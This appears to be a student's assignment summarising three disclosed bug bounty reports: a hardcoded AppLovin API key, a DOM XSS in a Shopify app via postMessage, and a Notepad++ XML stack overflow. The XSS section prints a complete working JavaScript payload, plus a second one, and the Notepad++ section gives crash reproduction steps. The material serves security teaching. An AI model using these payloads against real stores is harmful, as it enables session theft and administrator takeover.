1. Sri Lanka Institute of Information Technology
Master of Science (Information Management) Degree Program
Information and Network Security
Assignment 3
Bug bounty
W.M.J.H. Fernando
MS18901290
2. 2
AppLovin API Key hardcoded in a Github repo
Theyfound SensitiveDataExposure ingithub/mopub-android-mediationproject,the AppLovinUIAPIkey
ishardcodedinsource code. The mainimpactis productionAPIkeythenitshouldn'tbe shownpubliclyin
Githubrepo otherwise itcan be used by otherdevelopersasit's a companypropertythe APIkeyshould
be secure as it's a monetize API key.
Thiskeyisusedfor initializationof the app, butAPIKeyshouldnotbe disclosedpubliclyinaGithubrepo.
There are 2 perspective levels.
Developer perspective
EveryAPI keyhas some certainusage limitandif otherdevelopersuse thissame keythenAPIkey usage
limit will get reduced.
Attacker perspective
Attacker can use this key to violate GDPR policy because from May 25th 2018 AppLovin compliant with
GDPR and there are certainruleswhichneedtobe followedwhile buildingthe appandif an attacker got
thiskeyhe will violate GDPRrulesandit will be a huge problem to the company. These are some links,
AppLovinGDPRpolicylink
1. https://www.applovin.com/privacy/
2. https://www.applovin.com/gdprfaqs/
Mopub GDPR PublisherIntegrationGuide
1. https://developers.mopub.com/publishers/best-practices/gdpr-guide/
3. 3
As perGoogle AppLovinSDKDocs,EUconsentand GDPR
1. https://developers.google.com/admob/android/mediation/applovin
Under the Google EU User Consent Policy, you must ensure that certain disclosures are given to, and
consentsobtainedfrom,usersinthe EuropeanEconomicArea(EEA)regardingtheuseof deviceidentifiers
andpersonal data.Thispolicyreflectsthe requirementsof the EUePrivacyDirectiveandthe GeneralData
Protection Regulation (GDPR). When seeking consent, you must identify each ad network in your
mediation chain that may collect, receive, or use personal data and provide information about each
network's use. Google currently is unable to pass the user's consent choice to such networks
automatically.
The best way committing the code to Github repo you shouldn't commit your application Key because
you neverknowwhenthingswill gowrong,the API_KEY is alwayscompany propertyand it shouldn'tbe
disclosed publicly.
4. 4
DOM XSS via Shopify.API.remoteRedirect
This problem foundadom xsson the apple-business-chatappthatseemsto be referringto a vulnerable
js file. Foruserswho have installedthisapp,justlethimuse the theme code I providedtocomplete xss.
Modify the theme code to the following payload.
<script>
function attack(){
let ctx=window.open('https://apple-business-chat-
commerce.shopifycloud.com'),interval;
let
payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.dom
ain)`);
interval=setInterval(()=>{
ctx && ctx.postMessage({
"message":"Shopify.API.remoteRedirect",
"data":{
"location":`javascript:eval(atob('${payload}'))`
}
},location.origin);
},500);
window.onmessage=(e)=>{
e.data==="success"&&(
console.log('attack success'),
window.onmessage=null,
clearInterval(interval)
);
};
}
attack();
</script>
<a href="javascript:attack()" style="display:block;text-
align:center;width:100%;height:300px;line-
height:300px;background:#000;color:#fff;">click me start attack</a>
5. 5
As shown below
Then click on the store front page to trigger
Impact
Steal session information, add administrators, etc.
6. 6
Another API is also affected by xss
postMessage({
"message":"Shopify.API.Bar.initialize",
"data":{
pagination: {
next: {
href: "javascript:alert(document.domain)",
target: "new"
},
previous: {
href: "javascript:alert(document.domain)",
target: "new"
}
}
}
});
7. 7
Stack overflow in XML Parsing
Summary:
A stack bufferoverflowvulnerabilityhasbeendetectedinXMLparsingfunctionalityon Notepad++
v7.6.2 (32 bits).
That's due to the fact that _ invisibleEditView.getTextfunctiondoesn'tcheckbufferboundaries.
Description:
Vulnerabilitysrcfile:notepad-plus-plus/PowerEditor/src/Notepad_plus.cpp
Vulnerabilityline:line1008
Variable affected:charencodingStr[128];
Functionthatoverflowsbuffer:_invisibleEditView.getText
Stepsto Reproduce:
1. Create a .xml file withacorrect XML format
2. Introduce a bigXML fieldthatoverflows"encodingStr"buffer.
3. Openthe file withNotepad++andapplicationshouldcrash.
Supporting Material/References:
BoF_example1.xml->Exploitexample
Impact
An attackercouldcreate a malicious.xml filethattriggersastack bufferoverflow onvictimmachine.
You onlyneedtoopenattached.xml file examplewithNotepad++toreproduce the exploit.